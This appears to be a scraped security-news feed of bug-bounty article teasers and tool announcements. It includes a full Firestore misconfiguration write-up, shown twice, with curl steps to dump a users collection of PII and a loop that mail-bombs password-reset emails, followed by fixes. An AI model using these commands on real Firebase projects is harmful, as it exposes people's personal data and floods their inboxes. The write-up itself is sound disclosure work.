LaZagne Explained | How Saved Passwords Can Be Exposed During Pentesting
Modern operating systems and applications make life easier by remembering passwords, credentials, tokens, Wi-Fi keys, SSH information…Continue reading on Medium »
Read more...
Modern operating systems and applications make life easier by remembering passwords, credentials, tokens, Wi-Fi keys, SSH information…Continue reading on Medium »
Read more...
Medium
🔥 LaZagne Explained | How Saved Passwords Can Be Exposed During Pentesting
Modern operating systems and applications make life easier by remembering passwords, credentials, tokens, Wi-Fi keys, SSH information…
The Victim Paid. The Attacker Used Their Subscription.
Hi, I’m el7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.Continue reading on Medium »
Read more...
Hi, I’m el7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.Continue reading on Medium »
Read more...
Medium
The Victim Paid. The Attacker Used Their Subscription.
Hi, I’m el7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.
The AI Bug Bounty Delusion: Why LLMs and Scanners Won’t Make You a Hacker
If you spend more than five minutes on InfoSec social media, you’ve seen the hustle. “We don’t need to do manual hacking anymore.” “Run…Continue reading on Medium »
Read more...
If you spend more than five minutes on InfoSec social media, you’ve seen the hustle. “We don’t need to do manual hacking anymore.” “Run…Continue reading on Medium »
Read more...
Medium
The AI Bug Bounty Delusion: Why LLMs and Scanners Won’t Make You a Hacker
If you spend more than five minutes on InfoSec social media, you’ve seen the hustle. “We don’t need to do manual hacking anymore.” “Run…
Shuffle v2.3.0-rc1
https://kitploit.com/en/posts/github-shuffle-shuffle-v230-rc1
Open-source security orchestration, automation, and response (SOAR) platform with a visual workflow editor, prebuilt security app integrations, and hybrid resource sharing for SOC teams.
https://kitploit.com/en/posts/github-shuffle-shuffle-v230-rc1
Open-source security orchestration, automation, and response (SOAR) platform with a visual workflow editor, prebuilt security app integrations, and hybrid resource sharing for SOC teams.
Dark-Moon v1.4.0
https://kitploit.com/en/posts/github-ascit31-dark-moon-v140
Autonomous AI pentesting engine, continuous offensive security across web, cloud, AD & Kubernetes. Agentic reasoning + real exploit execution deliver proof-based vulnerabilities. Privacy gateway: the LLM never sees your real IPs, hosts, creds or paths (deterministic placeholders rehydrated locally), nothing leaves your perimeter.
https://kitploit.com/en/posts/github-ascit31-dark-moon-v140
Autonomous AI pentesting engine, continuous offensive security across web, cloud, AD & Kubernetes. Agentic reasoning + real exploit execution deliver proof-based vulnerabilities. Privacy gateway: the LLM never sees your real IPs, hosts, creds or paths (deterministic placeholders rehydrated locally), nothing leaves your perimeter.
opencti v7.260907.0
https://kitploit.com/en/posts/github-opencti-platform-opencti-72609070
Open Cyber Threat Intelligence Platform
https://kitploit.com/en/posts/github-opencti-platform-opencti-72609070
Open Cyber Threat Intelligence Platform
I Wasn’t Hunting an Email Bug. I Just Changed One Word.
Hi, I’m El7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.Continue reading on Medium »
Read more...
Hi, I’m El7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.Continue reading on Medium »
Read more...
Medium
I Wasn’t Hunting an Email Bug. I Just Changed One Word (ATO).
Hi, I’m El7xoot, a Bug Hunter and Security Researcher focused on web applications and APIs.
Advanced Vulnerabilities Part 2: Cross-Chain, Signatures & Upgradeable Pitfalls
Series: Web3 Security Zero se Advance 🛡️ | Article #22 By HackerMD | 32 min readContinue reading on Medium »
Read more...
Series: Web3 Security Zero se Advance 🛡️ | Article #22 By HackerMD | 32 min readContinue reading on Medium »
Read more...
Medium
Advanced Vulnerabilities Part 2: Cross-Chain, Signatures & Upgradeable Pitfalls
Series: Web3 Security Zero se Advance 🛡️ | Article #22 By HackerMD | 32 min read
How I Could Have Shut Down Every Restaurant in Europe With One Click
I found a Broken Access Control vulnerability that could let one restaurant modify another restaurant’s delivery zones.Continue reading on Medium »
Read more...
I found a Broken Access Control vulnerability that could let one restaurant modify another restaurant’s delivery zones.Continue reading on Medium »
Read more...
Medium
How I Could Have Shut Down Every Restaurant in Europe With One Click
I found a Broken Access Control vulnerability that could let one restaurant modify another restaurant’s delivery zones.
DOM XSS Deep Dive: Sources, Sinks, and Backwards Tracing
https://kd-200.medium.com/dom-xss-deep-dive-sources-sinks-and-backwards-tracing-9253fdb8975c?source=rss------bug_bounty-5
https://kd-200.medium.com/dom-xss-deep-dive-sources-sinks-and-backwards-tracing-9253fdb8975c?source=rss------bug_bounty-5
Hello, I am Nitin.Continue reading on Medium » (https://kd-200.medium.com/dom-xss-deep-dive-sources-sinks-and-backwards-tracing-9253fdb8975c?source=rss------bug_bounty-5)
How Did I Find a Subdomain Takeover in a HackerOne Program?
https://medium.com/@jakalalokesh07/how-did-i-find-a-subdomain-takeover-in-a-hackerone-program-2f2ba3b3adf6?source=rss------bug_bounty-5
https://medium.com/@jakalalokesh07/how-did-i-find-a-subdomain-takeover-in-a-hackerone-program-2f2ba3b3adf6?source=rss------bug_bounty-5
How a forgotten DNS record led me to an unclaimed Heroku applicationContinue reading on Medium » (https://medium.com/@jakalalokesh07/how-did-i-find-a-subdomain-takeover-in-a-hackerone-program-2f2ba3b3adf6?source=rss------bug_bounty-5)
LaZagne Explained | How Saved Passwords Can Be Exposed During Pentesting
https://medium.com/@pentesterclubpvtltd/lazagne-explained-how-saved-passwords-can-be-exposed-during-pentesting-9d8ebf9550b8?source=rss------bug_bounty-5
https://medium.com/@pentesterclubpvtltd/lazagne-explained-how-saved-passwords-can-be-exposed-during-pentesting-9d8ebf9550b8?source=rss------bug_bounty-5
Modern operating systems and applications make life easier by remembering passwords, credentials, tokens, Wi-Fi keys, SSH information…Continue reading on Medium » (https://medium.com/@pentesterclubpvtltd/lazagne-explained-how-saved-passwords-can-be-exposed-during-pentesting-9d8ebf9550b8?source=rss------bug_bounty-5)
Insecure Firestore Security Rules & PII Exposure
After poking with firebase R/WRealtime Database (Unauthenticated): https://REDACTED.firebaseio.com/.json (Access Denied)Storage Bucket (Unauthenticated): https://firebasestorage.googleapis.com/v0/b/REDACTED.appspot.com/o (Access Denied)Firestore (Unauthenticated): https://firestore.googleapis.com/v1/projects/REDACTED/databases/(default)/documents (Access Denied)Auth Action / Callback URLs: Testing against https://REDACTED.firebaseapp.com/_/auth/action?mode=verifyEmail... resulted in errors/failed states. I moved to cli and got hit for /user endpointDescription & Root CauseInsecure Firestore Rules: The /users collection lacks proper ownership verification (request.auth.uid == resource.id). Any user who creates a standard, low-privilege account can query the Firestore REST API to extract all registered user records, including sensitive PII.Exposed Credentials / Endpoints: The Firebase API key and project identifiers are exposed in client-side configuration URLs, enabling direct interaction with Firebase backend services.Mail Bombing Vector: The Identity Toolkit API (sendOobCode) lacks strict rate-limiting, allowing malicious actors to flood arbitrary email addresses with automated password reset notifications.3. Steps to Reproduce At first i got that valid api from password reset link I got project ID/name from deep diving in js and fuzzingStep 1: Obtain a Low-Privilege Authentication Token Register a test user via the Firebase Auth REST API to obtain a valid JWT:curl -s -X POST 'https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY_HERE' \ -H 'Content-Type: application/json' \ -d '{"email":"email protected","password":"TestPassword123!","returnSecureToken":true}' Extract the idToken from the response JSON and save it:export TOKEN="<token>"Step 2: Dump the Entire /users Collectioncurl -s "https://firestore.googleapis.com/v1/projects/REDACTED\_PROJECT\_ID/databases/(default)/documents/users" \ -H "Authorization: Bearer $TOKEN" Result: The server returns a JSON payload containing the complete database of user details, documents, Bio, every PII’s that is of high impact and that paves path for further attack vector’s.Step 3: Password Reset Mail Bombingfor i in {1..10}; do curl -s -X POST 'https://identitytoolkit.googleapis.com/v1/accounts:sendOobCode?key=API_KEY_HERE' \ -H 'Content-Type: application/json' \ -d '{"requestType": "PASSWORD_RESET", "email": "email protected", "clientType": "CLIENT_TYPE_WEB"}' echo "Request $i sent" sleep 0.5 done4. ImpactAccount Takeover / Phishing Risk: Exposed user directory data facilitates targeted phishing campaigns and impersonation.Mail Bombing: Unthrottled password reset requests flood target inboxes, degrading service reliability and user trust.Enforce Firestore Security Rules: Update rules in the Firebase Console to restrict read/write access so users can only access their own user documents: match /users/{userId} { allow read, write: if request.auth != null && request.auth.uid == userId; }Implement Rate Limiting: Apply rate limits and CAPTCHA challenges to authentication and password reset endpoints (sendOobCode) via Firebase App Check or backend proxies to prevent abuse and mail bombing. Originally published at https://noob6t5.hashnode.dev on August 22, 2026. Insecure Firestore Security Rules & PII Exposure was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
Read more...
After poking with firebase R/WRealtime Database (Unauthenticated): https://REDACTED.firebaseio.com/.json (Access Denied)Storage Bucket (Unauthenticated): https://firebasestorage.googleapis.com/v0/b/REDACTED.appspot.com/o (Access Denied)Firestore (Unauthenticated): https://firestore.googleapis.com/v1/projects/REDACTED/databases/(default)/documents (Access Denied)Auth Action / Callback URLs: Testing against https://REDACTED.firebaseapp.com/_/auth/action?mode=verifyEmail... resulted in errors/failed states. I moved to cli and got hit for /user endpointDescription & Root CauseInsecure Firestore Rules: The /users collection lacks proper ownership verification (request.auth.uid == resource.id). Any user who creates a standard, low-privilege account can query the Firestore REST API to extract all registered user records, including sensitive PII.Exposed Credentials / Endpoints: The Firebase API key and project identifiers are exposed in client-side configuration URLs, enabling direct interaction with Firebase backend services.Mail Bombing Vector: The Identity Toolkit API (sendOobCode) lacks strict rate-limiting, allowing malicious actors to flood arbitrary email addresses with automated password reset notifications.3. Steps to Reproduce At first i got that valid api from password reset link I got project ID/name from deep diving in js and fuzzingStep 1: Obtain a Low-Privilege Authentication Token Register a test user via the Firebase Auth REST API to obtain a valid JWT:curl -s -X POST 'https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY_HERE' \ -H 'Content-Type: application/json' \ -d '{"email":"email protected","password":"TestPassword123!","returnSecureToken":true}' Extract the idToken from the response JSON and save it:export TOKEN="<token>"Step 2: Dump the Entire /users Collectioncurl -s "https://firestore.googleapis.com/v1/projects/REDACTED\_PROJECT\_ID/databases/(default)/documents/users" \ -H "Authorization: Bearer $TOKEN" Result: The server returns a JSON payload containing the complete database of user details, documents, Bio, every PII’s that is of high impact and that paves path for further attack vector’s.Step 3: Password Reset Mail Bombingfor i in {1..10}; do curl -s -X POST 'https://identitytoolkit.googleapis.com/v1/accounts:sendOobCode?key=API_KEY_HERE' \ -H 'Content-Type: application/json' \ -d '{"requestType": "PASSWORD_RESET", "email": "email protected", "clientType": "CLIENT_TYPE_WEB"}' echo "Request $i sent" sleep 0.5 done4. ImpactAccount Takeover / Phishing Risk: Exposed user directory data facilitates targeted phishing campaigns and impersonation.Mail Bombing: Unthrottled password reset requests flood target inboxes, degrading service reliability and user trust.Enforce Firestore Security Rules: Update rules in the Firebase Console to restrict read/write access so users can only access their own user documents: match /users/{userId} { allow read, write: if request.auth != null && request.auth.uid == userId; }Implement Rate Limiting: Apply rate limits and CAPTCHA challenges to authentication and password reset endpoints (sendOobCode) via Firebase App Check or backend proxies to prevent abuse and mail bombing. Originally published at https://noob6t5.hashnode.dev on August 22, 2026. Insecure Firestore Security Rules & PII Exposure was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
Read more...
SkillSpector v2.11.1
Security scanner for AI agent skills. Detect vulnerabilities, malicious patterns, security risks, prompt injection, data exfiltration, and supply-chain risks in Claude Code, Codex, and MCP skills before you install them.
Read more...
Security scanner for AI agent skills. Detect vulnerabilities, malicious patterns, security risks, prompt injection, data exfiltration, and supply-chain risks in Claude Code, Codex, and MCP skills before you install them.
Read more...